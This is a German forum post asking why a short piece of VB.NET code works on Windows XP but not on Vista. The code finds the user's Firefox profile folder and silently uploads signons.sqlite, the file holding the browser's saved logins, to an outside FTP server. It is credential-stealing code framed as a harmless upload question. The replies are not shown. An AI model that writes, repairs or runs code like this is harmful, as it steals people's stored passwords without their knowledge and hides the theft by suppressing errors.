Was ist an diesem Code für einen FTP Upload falsch [Ich verzweifle langsam]??

  • VB.NET

Es gibt 3 Antworten in diesem Thema. Der letzte Beitrag () ist von FAtheone.

    Was ist an diesem Code für einen FTP Upload falsch [Ich verzweifle langsam]??

    VB.NET-Quellcode

    1. Dim Passwortdatei As String = "signons.sqlite"
    2. For Each SubFolder As String In Directory.GetDirectories("C:\Users\" & GetUserName & "\AppData\Roaming\Mozilla\Firefox\Profiles\")
    3. Me.Text = SubFolder
    4. Next
    5. Try
    6. My.Computer.Network.UploadFile(Me.Text & "\" & Passwortdatei, "ftp://fp." & "DER FTP SERVER" & "/" + "signons.sqlite", "BENUTZERNAME", "PASSWORT", True, 500)
    7. catch ex as exemption
    8. end try




    Ich verstehe es nich da es bei windows xp pr klappt! und bei windows vista home nicht...liegt das an dem port oder so???...Bitte helft mir!

    Die Funktion für das "Get Username ist 100pro richtig deswegen habe ich sie jetzt nicht mit in den Code genommen...also das getusername habe ich auch ne funktion